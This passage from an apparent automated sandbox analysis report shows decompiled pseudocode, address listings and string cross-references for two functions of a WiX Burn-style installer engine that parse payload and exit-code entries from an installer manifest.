				intOrPtr _t176;

				_v20 = _v20 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t176 = E00435FBE(_a16, L"Payload",  &_v20);
				if(_t176 >= 0) {
					_t92 = _v20;
					_t176 =  *((intOrPtr*)( *_t92 + 0x20))(_t92,  &_v16);
					if(_t176 >= 0) {
						_t94 = _v16;
						if(_v16 != 0) {
							_t102 = E00431078(_t94 * 0x58, 1);
							_t157 = _a4;
							 *_t157 = _t102;
							if(_t102 != 0) {
								_t103 = _v16;
								_a16 = _a16 & 0x00000000;
								 *((intOrPtr*)(_t157 + 4)) = _t103;
								if(_t103 == 0) {
									L50:
									_t176 = 0;
								} else {
									_t162 = 0;
									_a4 = 0;
									while(1) {
										_t175 =  *_t157 + _t162;
										_t176 = E00435F1D(_t162, _v20,  &_v12, 0);
										if(_t176 < 0) {
											break;
										}
										_t176 = E00435B5E(_v12, L"Id", _t175);
										if(_t176 < 0) {
											_push("Failed to get @Id.");
											goto L81;
										} else {
											_t176 = E00435B5E(_v12, L"FilePath", _t175 + 0x18);
											if(_t176 < 0) {
												_push("Failed to get @FilePath.");
												goto L81;
											} else {
												_t176 = E00435B5E(_v12, L"Packaging",  &_v8);
												if(_t176 < 0) {
													_push("Failed to get @Packaging.");
													goto L81;
												} else {
													if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"download", 0xffffffff) != 2) {
														_t113 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"embedded", 0xffffffff);
														if(_t113 != 2) {
															if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"external", 0xffffffff) != 2) {
																_push(_v8);
																_t176 = 0x80070057;
																_push("Invalid value for @Packaging: %ls");
																goto L76;
															} else {
																 *(_t175 + 4) = 3;
																goto L20;
															}
														} else {
															 *(_t175 + 4) = _t113;
															goto L20;
														}
													} else {
														 *(_t175 + 4) = 1;
														L20:
														if(_a8 == 0) {
															L25:
															_t176 = E00435D6C(_t162, _v12, L"LayoutOnly", _t175 + 8);
															if(_t176 == 0x80070490 || _t176 >= 0) {
																_t176 = E00435B5E(_v12, L"SourcePath", _t175 + 0x38);
																if(_t176 != 0x80070490 ||  *(_t175 + 4) != 1) {
																	if(_t176 < 0) {
																		_push("Failed to get @SourcePath.");
																		goto L81;
																	} else {
																		goto L30;
																	}
																} else {
																	L30:
																	_t176 = E00435B5E(_v12, L"DownloadUrl", _t175 + 0x40);
																	if(_t176 != 0x80070490 ||  *(_t175 + 4) == 1) {
																		if(_t176 < 0) {
																			_push("Failed to get @DownloadUrl.");
																			goto L81;
																		} else {
																			goto L33;
																		}
																	} else {
																		L33:
																		_t176 = E00435B5E(_v12, L"FileSize",  &_v8);
																		if(_t176 == 0x80070490) {
																			L36:
																			_t176 = E00435B5E(_v12, L"CertificateRootPublicKeyIdentifier",  &_v8);
																			if(_t176 == 0x80070490) {
																				L39:
																				_t176 = E00435B5E(_v12, L"CertificateRootThumbprint",  &_v8);
																				if(_t176 == 0x80070490) {
																					L42:
																					_t176 = E00435B5E(_v12, L"Hash",  &_v8);
																					if(_t176 < 0) {
																						_push("Failed to get @Hash.");
																						goto L81;
																					} else {
																						_t176 = E00433E39(_t162, _v8, _t175 + 0x30, _t175 + 0x34);
																						if(_t176 < 0) {
																							_push("Failed to hex decode the Payload/@Hash.");
																							goto L81;
																						} else {
																							_t176 = E00435B5E(_v12, L"Catalog",  &_v8);
																							if(_t176 == 0x80070490) {
																								L47:
																								_t165 = _v12;
																								if(_t165 != 0) {
																									 *((intOrPtr*)( *_t165 + 8))(_t165);
																									_v12 = _v12 & 0x00000000;
																								}
																								_t136 = _a16 + 1;
																								_t162 = _a4 + 0x58;
																								_a16 = _t136;
																								_a4 = _t162;
																								if(_t136 < _v16) {
																									continue;
																								} else {
																									goto L50;
																								}
																							} else {
																								if(_t176 < 0) {
																									_push("Failed to get @Catalog.");
																									goto L81;
																								} else {
																									_t176 = E00407A56(_t162, _a12, _v8, _t175 + 0x1c);
																									if(_t176 < 0) {
																										_push("Failed to find catalog.");
																										goto L81;
																									} else {
																										goto L47;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					if(_t176 < 0) {
																						_push("Failed to get @CertificateRootThumbprint.");
																						goto L81;
																					} else {
																						_t176 = E00433E39(_t162, _v8, _t175 + 0x28, _t175 + 0x2c);
																						if(_t176 < 0) {
																							_push("Failed to hex decode @CertificateRootThumbprint.");
																							goto L81;
																						} else {
																							goto L42;
																						}
																					}
																				}
																			} else {
																				if(_t176 < 0) {
																					_push("Failed to get @CertificateRootPublicKeyIdentifier.");
																					goto L81;
																				} else {
																					_t176 = E00433E39(_t162, _v8, _t175 + 0x20, _t175 + 0x24);
																					if(_t176 < 0) {
																						_push("Failed to hex decode @CertificateRootPublicKeyIdentifier.");
																						goto L81;
																					} else {
																						goto L39;
																					}
																				}
																			}
																		} else {
																			if(_t176 < 0) {
																				_push("Failed to get @FileSize.");
																				goto L81;
																			} else {
																				_t176 = E0043472D(_v8, 0, _t175 + 0x10);
																				if(_t176 < 0) {
																					_push("Failed to parse @FileSize.");
																					goto L81;
																				} else {
																					goto L36;
																				}
																			}
																		}
																	}
																}
															} else {
																_push("Failed to get @LayoutOnly.");
																goto L81;
															}
														} else {
															_t176 = E00435B5E(_v12, L"Container",  &_v8);
															if(_t176 != 0x80070490 ||  *(_t175 + 4) == 2) {
																if(_t176 < 0) {
																	_push("Failed to get @Container.");
																	L81:
																	_push(_t176);
																	E00430A57();
																} else {
																	_t176 = E00418EC8(_t162, _a8, _v8, _t175 + 0x3c);
																	if(_t176 < 0) {
																		_push(_v8);
																		_push("Failed to to find container: %ls");
																		L76:
																		_push(_t176);
																		E00430A57();
																	} else {
																		goto L25;
																	}
																}
															} else {
																goto L25;
															}
														}
													}
												}
											}
										}
										goto L51;
									}
									_push("Failed to get next node.");
									goto L81;
								}
								L51:
							} else {
								_t176 = 0x8007000e;
								E004300D9(_t102, "payload.cpp", 0x39, 0x8007000e);
								_push("Failed to allocate memory for payload structs.");
								_push(0x8007000e);
								E00430A57();
							}
						}
					} else {
						_push("Failed to get payload node count.");
						goto L4;
					}
				} else {
					_push("Failed to select payload nodes.");
					L4:
					_push(_t176);
					E00430A57();
				}
				_t160 = _v20;
				if(_t160 != 0) {
					 *((intOrPtr*)( *_t160 + 8))(_t160);
				}
				_t161 = _v12;
				if(_t161 != 0) {
					 *((intOrPtr*)( *_t161 + 8))(_t161);
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				return _t176;
			}



















                                                                                                                                                                  0x00407fad
                                                                                                                                                                  0x00407fb1
                                                                                                                                                                  0x00407fb5
                                                                                                                                                                  0x00407fb9
                                                                                                                                                                  0x00407fcf
                                                                                                                                                                  0x00407fd3
                                                                                                                                                                  0x00407fdc
                                                                                                                                                                  0x00407fe9
                                                                                                                                                                  0x00407fed
                                                                                                                                                                  0x00408001
                                                                                                                                                                  0x00408006
                                                                                                                                                                  0x00408013
                                                                                                                                                                  0x00408018
                                                                                                                                                                  0x0040801b
                                                                                                                                                                  0x0040801f
                                                                                                                                                                  0x00408045
                                                                                                                                                                  0x00408048
                                                                                                                                                                  0x0040804d
                                                                                                                                                                  0x00408052
                                                                                                                                                                  0x00408338
                                                                                                                                                                  0x00408338
                                                                                                                                                                  0x00408058
                                                                                                                                                                  0x00408058
                                                                                                                                                                  0x0040805a
                                                                                                                                                                  0x0040805d
                                                                                                                                                                  0x00408068
                                                                                                                                                                  0x0040806f
                                                                                                                                                                  0x00408073
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408087
                                                                                                                                                                  0x0040808b
                                                                                                                                                                  0x00408409
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408091
                                                                                                                                                                  0x004080a2
                                                                                                                                                                  0x004080a6
                                                                                                                                                                  0x00408402
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004080ac
                                                                                                                                                                  0x004080bd
                                                                                                                                                                  0x004080c1
                                                                                                                                                                  0x004083fb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004080c7
                                                                                                                                                                  0x004080e2
                                                                                                                                                                  0x004080fd
                                                                                                                                                                  0x00408102
                                                                                                                                                                  0x0040811e
                                                                                                                                                                  0x004083e0
                                                                                                                                                                  0x004083e3
                                                                                                                                                                  0x004083e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408124
                                                                                                                                                                  0x00408124
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408124
                                                                                                                                                                  0x00408104
                                                                                                                                                                  0x00408104
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408104
                                                                                                                                                                  0x004080e4
                                                                                                                                                                  0x004080e4
                                                                                                                                                                  0x0040812b
                                                                                                                                                                  0x0040812f
                                                                                                                                                                  0x00408173
                                                                                                                                                                  0x00408184
                                                                                                                                                                  0x0040818c
                                                                                                                                                                  0x004081a7
                                                                                                                                                                  0x004081af
                                                                                                                                                                  0x004081b9
                                                                                                                                                                  0x004083d9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004081bf
                                                                                                                                                                  0x004081bf
                                                                                                                                                                  0x004081d0
                                                                                                                                                                  0x004081d8
                                                                                                                                                                  0x004081e2
                                                                                                                                                                  0x004083d2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004081e8
                                                                                                                                                                  0x004081e8
                                                                                                                                                                  0x004081f9
                                                                                                                                                                  0x00408201
                                                                                                                                                                  0x00408223
                                                                                                                                                                  0x00408234
                                                                                                                                                                  0x0040823c
                                                                                                                                                                  0x00408260
                                                                                                                                                                  0x00408271
                                                                                                                                                                  0x00408279
                                                                                                                                                                  0x0040829d
                                                                                                                                                                  0x004082ae
                                                                                                                                                                  0x004082b2
                                                                                                                                                                  0x004083cb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004082b8
                                                                                                                                                                  0x004082c8
                                                                                                                                                                  0x004082cc
                                                                                                                                                                  0x004083c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004082d2
                                                                                                                                                                  0x004082e3
                                                                                                                                                                  0x004082eb
                                                                                                                                                                  0x0040830e
                                                                                                                                                                  0x0040830e
                                                                                                                                                                  0x00408313
                                                                                                                                                                  0x00408318
                                                                                                                                                                  0x0040831b
                                                                                                                                                                  0x0040831b
                                                                                                                                                                  0x00408325
                                                                                                                                                                  0x00408326
                                                                                                                                                                  0x00408329
                                                                                                                                                                  0x0040832c
                                                                                                                                                                  0x00408332
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004082ed
                                                                                                                                                                  0x004082ef
                                                                                                                                                                  0x004083bd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004082f5
                                                                                                                                                                  0x00408304
                                                                                                                                                                  0x00408308
                                                                                                                                                                  0x004083b6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408308
                                                                                                                                                                  0x004082ef
                                                                                                                                                                  0x004082eb
                                                                                                                                                                  0x004082cc
                                                                                                                                                                  0x0040827b
                                                                                                                                                                  0x0040827d
                                                                                                                                                                  0x004083af
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408283
                                                                                                                                                                  0x00408293
                                                                                                                                                                  0x00408297
                                                                                                                                                                  0x004083a8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408297
                                                                                                                                                                  0x0040827d
                                                                                                                                                                  0x0040823e
                                                                                                                                                                  0x00408240
                                                                                                                                                                  0x004083a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408246
                                                                                                                                                                  0x00408256
                                                                                                                                                                  0x0040825a
                                                                                                                                                                  0x0040839a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040825a
                                                                                                                                                                  0x00408240
                                                                                                                                                                  0x00408203
                                                                                                                                                                  0x00408205
                                                                                                                                                                  0x00408393
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040820b
                                                                                                                                                                  0x00408219
                                                                                                                                                                  0x0040821d
                                                                                                                                                                  0x00408389
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040821d
                                                                                                                                                                  0x00408205
                                                                                                                                                                  0x00408201
                                                                                                                                                                  0x004081d8
                                                                                                                                                                  0x0040837f
                                                                                                                                                                  0x0040837f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040837f
                                                                                                                                                                  0x00408131
                                                                                                                                                                  0x00408142
                                                                                                                                                                  0x0040814a
                                                                                                                                                                  0x00408154
                                                                                                                                                                  0x00408375
                                                                                                                                                                  0x00408415
                                                                                                                                                                  0x00408415
                                                                                                                                                                  0x00408416
                                                                                                                                                                  0x0040815a
                                                                                                                                                                  0x00408169
                                                                                                                                                                  0x0040816d
                                                                                                                                                                  0x0040836b
                                                                                                                                                                  0x0040836e
                                                                                                                                                                  0x004083ed
                                                                                                                                                                  0x004083ed
                                                                                                                                                                  0x004083ee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040816d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040814a
                                                                                                                                                                  0x0040812f
                                                                                                                                                                  0x004080e2
                                                                                                                                                                  0x004080c1
                                                                                                                                                                  0x004080a6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040808b
                                                                                                                                                                  0x00408410
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408410
                                                                                                                                                                  0x0040833a
                                                                                                                                                                  0x00408021
                                                                                                                                                                  0x00408021
                                                                                                                                                                  0x0040802e
                                                                                                                                                                  0x00408033
                                                                                                                                                                  0x00408038
                                                                                                                                                                  0x00408039
                                                                                                                                                                  0x0040803f
                                                                                                                                                                  0x0040833b
                                                                                                                                                                  0x00407fef
                                                                                                                                                                  0x00407fef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407fef
                                                                                                                                                                  0x00407fd5
                                                                                                                                                                  0x00407fd5
                                                                                                                                                                  0x00407ff4
                                                                                                                                                                  0x00407ff4
                                                                                                                                                                  0x00407ff5
                                                                                                                                                                  0x00407ffb
                                                                                                                                                                  0x0040833c
                                                                                                                                                                  0x00408341
                                                                                                                                                                  0x00408346
                                                                                                                                                                  0x00408346
                                                                                                                                                                  0x00408349
                                                                                                                                                                  0x0040834e
                                                                                                                                                                  0x00408353
                                                                                                                                                                  0x00408353
                                                                                                                                                                  0x0040835a
                                                                                                                                                                  0x0040835f
                                                                                                                                                                  0x0040835f
                                                                                                                                                                  0x00408368

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,?,00000000,0043C524,?,00000000), ref: 004080DD
                                                                                                                                                                  Strings
                                                                                                                                                                  • embedded, xrefs: 004080EF
                                                                                                                                                                  • Failed to get @Packaging., xrefs: 004083FB
                                                                                                                                                                  • Hash, xrefs: 004082A1
                                                                                                                                                                  • Catalog, xrefs: 004082D6
                                                                                                                                                                  • Failed to select payload nodes., xrefs: 00407FD5
                                                                                                                                                                  • Failed to to find container: %ls, xrefs: 0040836E
                                                                                                                                                                  • Failed to get payload node count., xrefs: 00407FEF
                                                                                                                                                                  • Failed to allocate memory for payload structs., xrefs: 00408033
                                                                                                                                                                  • Failed to get @SourcePath., xrefs: 004083D9
                                                                                                                                                                  • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0040839A
                                                                                                                                                                  • Container, xrefs: 00408135
                                                                                                                                                                  • CertificateRootThumbprint, xrefs: 00408264
                                                                                                                                                                  • Failed to hex decode @CertificateRootThumbprint., xrefs: 004083A8
                                                                                                                                                                  • Failed to parse @FileSize., xrefs: 00408389
                                                                                                                                                                  • Failed to get @LayoutOnly., xrefs: 0040837F
                                                                                                                                                                  • Failed to get @Container., xrefs: 00408375
                                                                                                                                                                  • Failed to get @FileSize., xrefs: 00408393
                                                                                                                                                                  • DownloadUrl, xrefs: 004081C3
                                                                                                                                                                  • Failed to find catalog., xrefs: 004083B6
                                                                                                                                                                  • Failed to get @FilePath., xrefs: 00408402
                                                                                                                                                                  • Packaging, xrefs: 004080B0
                                                                                                                                                                  • Failed to get @Id., xrefs: 00408409
                                                                                                                                                                  • Invalid value for @Packaging: %ls, xrefs: 004083E8
                                                                                                                                                                  • Failed to get next node., xrefs: 00408410
                                                                                                                                                                  • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 004083A1
                                                                                                                                                                  • Failed to get @DownloadUrl., xrefs: 004083D2
                                                                                                                                                                  • Payload, xrefs: 00407FC2
                                                                                                                                                                  • external, xrefs: 0040810B
                                                                                                                                                                  • Failed to get @Catalog., xrefs: 004083BD
                                                                                                                                                                  • Failed to get @CertificateRootThumbprint., xrefs: 004083AF
                                                                                                                                                                  • Failed to get @Hash., xrefs: 004083CB
                                                                                                                                                                  • FileSize, xrefs: 004081EC
                                                                                                                                                                  • LayoutOnly, xrefs: 00408177
                                                                                                                                                                  • SourcePath, xrefs: 0040819A
                                                                                                                                                                  • CertificateRootPublicKeyIdentifier, xrefs: 00408227
                                                                                                                                                                  • download, xrefs: 004080CF
                                                                                                                                                                  • Failed to hex decode the Payload/@Hash., xrefs: 004083C4
                                                                                                                                                                  • payload.cpp, xrefs: 00408029
                                                                                                                                                                  • FilePath, xrefs: 00408095
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocCompareProcessString
                                                                                                                                                                  • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                                                                                                                                  • API String ID: 4260887210-3127305756
                                                                                                                                                                  • Opcode ID: ff240ce44b3c38aa1edce21a87984fb0e6764b5b7b5b5d2a75bd38f80e244f23
                                                                                                                                                                  • Instruction ID: 80920ea3dfdec78f9e58eb6797268f5c58797b597333a3559aa9886f20cfe25f
                                                                                                                                                                  • Opcode Fuzzy Hash: ff240ce44b3c38aa1edce21a87984fb0e6764b5b7b5b5d2a75bd38f80e244f23
                                                                                                                                                                  • Instruction Fuzzy Hash: 51C10531901626BBCB119A51CE01FAEB664AF48B24F21517FFD51B72C0DB3DAD019B9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00419C14, Relevance: 66.8, APIs: 7, Strings: 31, Instructions: 304COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E00419C14(intOrPtr _a4, signed int _a8) {
				short* _v8;
				signed int _v12;
				short* _v16;
				void* _v20;
				intOrPtr* _t77;
				intOrPtr _t87;
				short* _t88;
				int _t95;
				void* _t102;
				signed int _t106;
				int _t111;
				signed int* _t115;
				void* _t116;
				intOrPtr* _t118;
				signed int _t119;
				intOrPtr _t120;
				signed int _t123;
				intOrPtr* _t125;
				signed int _t127;
				signed int _t129;
				void* _t134;
				void* _t135;
				void* _t138;

				_t113 = _a4;
				_t129 = _a8;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(E00435B5E(_a4, L"DetectCondition", _t129 + 0x90) >= 0) {
					if(E00435B5E(_t113, L"InstallArguments", _t129 + 0x94) >= 0) {
						if(E00435B5E(_t113, L"UninstallArguments", _t129 + 0x9c) >= 0) {
							if(E00435B5E(_t113, L"RepairArguments", _t129 + 0x98) >= 0) {
								_t134 = E00435D6C(_t116, _t113, L"Repairable", _t129 + 0xa8);
								if(_t134 == 0x80070490 || _t134 >= 0) {
									_t135 = E00435B5E(_t113, L"Protocol",  &_v8);
									if(_t135 < 0) {
										if(_t135 == 0x80070490) {
											goto L14;
										} else {
											_push("Failed to get @Protocol.");
											goto L57;
										}
									} else {
										if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"burn", 0xffffffff) != 2) {
											_t111 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"netfx4", 0xffffffff);
											_t127 = 2;
											if(_t111 != _t127) {
												if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"none", 0xffffffff) != 2) {
													goto L58;
												} else {
													 *(_t129 + 0xac) =  *(_t129 + 0xac) & 0x00000000;
													goto L14;
												}
											} else {
												 *(_t129 + 0xac) = _t127;
												goto L14;
											}
										} else {
											 *(_t129 + 0xac) = 1;
											L14:
											if(E00435FBE(_t113, L"ExitCode",  &_v20) >= 0) {
												_t77 = _v20;
												_t128 =  &_v16;
												_push( &_v16);
												_push(_t77);
												if( *((intOrPtr*)( *_t77 + 0x20))() >= 0) {
													_t79 = _v16;
													if(_v16 == 0) {
														L46:
														_t138 = 0;
													} else {
														_t87 = E00431078(_t79 * 0xc, 1);
														 *((intOrPtr*)(_t129 + 0xb0)) = _t87;
														if(_t87 != 0) {
															_t88 = _v16;
															_a8 = _a8 & 0x00000000;
															 *((intOrPtr*)(_t129 + 0xb4)) = _t88;
															if(_t88 == 0) {
																goto L46;
															} else {
																_t120 = 0;
																_a4 = 0;
																while(1) {
																	_t115 =  *((intOrPtr*)(_t129 + 0xb0)) + _t120;
																	_t138 = E00435F1D(_t120, _v20,  &_v12, 0);
																	if(_t138 < 0) {
																		break;
																	}
																	_t138 = E00435B5E(_v12, L"Type",  &_v8);
																	if(_t138 < 0) {
																		_push("Failed to get @Type.");
																		goto L57;
																	} else {
																		if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"success", 0xffffffff) != 2) {
																			_t95 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"error", 0xffffffff);
																			_t123 = 2;
																			if(_t95 != _t123) {
																				if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"scheduleReboot", 0xffffffff) != 2) {
																					if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"forceReboot", 0xffffffff) != 2) {
																						L58:
																						_push(_v8);
																						_push("Invalid exit code type: %ls");
																						_t138 = 0x8000ffff;
																						_push(0x8000ffff);
																						goto L55;
																					} else {
																						 *_t115 = 4;
																						goto L39;
																					}
																				} else {
																					 *_t115 = 3;
																					goto L39;
																				}
																			} else {
																				 *_t115 = _t123;
																				goto L39;
																			}
																		} else {
																			 *_t115 = 1;
																			L39:
																			_t138 = E00435B5E(_v12, L"Code",  &_v8);
																			if(_t138 < 0) {
																				_push("Failed to get @Code.");
																				goto L57;
																			} else {
																				_t124 = _v8;
																				_t102 = 0x2a;
																				if(_t102 !=  *_v8) {
																					_t138 = E004346E9(_t124, _t128, _t124, 0,  &(_t115[1]));
																					if(_t138 < 0) {
																						_push(_v8);
																						_push("Failed to parse @Code value: %ls");
																						_push(_t138);
																						L55:
																						E00430A57();
																					} else {
																						goto L43;
																					}
																				} else {
																					_t115[2] = 1;
																					L43:
																					_t125 = _v12;
																					if(_t125 != 0) {
																						 *((intOrPtr*)( *_t125 + 8))(_t125);
																						_v12 = _v12 & 0x00000000;
																					}
																					_t106 = _a8 + 1;
																					_t120 = _a4 + 0xc;
																					_a8 = _t106;
																					_a4 = _t120;
																					if(_t106 < _v16) {
																						continue;
																					} else {
																						goto L46;
																					}
																				}
																			}
																		}
																	}
																	goto L47;
																}
																_push("Failed to get next node.");
																goto L57;
															}
														} else {
															_t138 = 0x8007000e;
															E004300D9(_t87, "exeengine.cpp", 0x65, 0x8007000e);
															_push("Failed to allocate memory for exit code structs.");
															goto L57;
														}
													}
												} else {
													_push("Failed to get exit code node count.");
													goto L57;
												}
											} else {
												_push("Failed to select exit code nodes.");
												goto L57;
											}
										}
									}
								} else {
									_push("Failed to get @Repairable.");
									goto L57;
								}
							} else {
								_push("Failed to get @RepairArguments.");
								goto L57;
							}
						} else {
							_push("Failed to get @UninstallArguments.");
							goto L57;
						}
					} else {
						_push("Failed to get @InstallArguments.");
						goto L57;
					}
				} else {
					_push("Failed to get @DetectCondition.");
					L57:
					_push(_t138);
					E00430A57();
				}
				L47:
				_t118 = _v20;
				if(_t118 != 0) {
					 *((intOrPtr*)( *_t118 + 8))(_t118);
				}
				_t119 = _v12;
				if(_t119 != 0) {
					 *((intOrPtr*)( *_t119 + 8))(_t119);
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				return _t138;
			}


























                                                                                                                                                                  0x00419c1b
                                                                                                                                                                  0x00419c20
                                                                                                                                                                  0x00419c25
                                                                                                                                                                  0x00419c28
                                                                                                                                                                  0x00419c2b
                                                                                                                                                                  0x00419c2e
                                                                                                                                                                  0x00419c47
                                                                                                                                                                  0x00419c69
                                                                                                                                                                  0x00419c8b
                                                                                                                                                                  0x00419cad
                                                                                                                                                                  0x00419ccb
                                                                                                                                                                  0x00419cd3
                                                                                                                                                                  0x00419cf2
                                                                                                                                                                  0x00419cf6
                                                                                                                                                                  0x00419d91
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419d93
                                                                                                                                                                  0x00419d93
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419d93
                                                                                                                                                                  0x00419cfc
                                                                                                                                                                  0x00419d15
                                                                                                                                                                  0x00419d56
                                                                                                                                                                  0x00419d5a
                                                                                                                                                                  0x00419d5d
                                                                                                                                                                  0x00419d7c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419d82
                                                                                                                                                                  0x00419d82
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419d82
                                                                                                                                                                  0x00419d5f
                                                                                                                                                                  0x00419d5f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419d5f
                                                                                                                                                                  0x00419d17
                                                                                                                                                                  0x00419d17
                                                                                                                                                                  0x00419d21
                                                                                                                                                                  0x00419d34
                                                                                                                                                                  0x00419d9d
                                                                                                                                                                  0x00419da0
                                                                                                                                                                  0x00419da5
                                                                                                                                                                  0x00419da6
                                                                                                                                                                  0x00419dae
                                                                                                                                                                  0x00419dba
                                                                                                                                                                  0x00419dbf
                                                                                                                                                                  0x00419f38
                                                                                                                                                                  0x00419f38
                                                                                                                                                                  0x00419dc5
                                                                                                                                                                  0x00419dcb
                                                                                                                                                                  0x00419dd0
                                                                                                                                                                  0x00419dd8
                                                                                                                                                                  0x00419df6
                                                                                                                                                                  0x00419df9
                                                                                                                                                                  0x00419dfd
                                                                                                                                                                  0x00419e05
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419e0b
                                                                                                                                                                  0x00419e0b
                                                                                                                                                                  0x00419e0d
                                                                                                                                                                  0x00419e10
                                                                                                                                                                  0x00419e1f
                                                                                                                                                                  0x00419e26
                                                                                                                                                                  0x00419e2a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419e41
                                                                                                                                                                  0x00419e45
                                                                                                                                                                  0x00419f9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00419e4b
                                                                                                                                                                  0x00419e66
                                                                                                                                                                  0x00419e80
                                                                                                                                                                  0x00419e84
                                                                                                                                                                  0x00419e87
                                                                                                                                                                  0x00419ea2
                                                                                                                                                                  0x00419ec1
                                                                                                                                                                  0x00419f8d
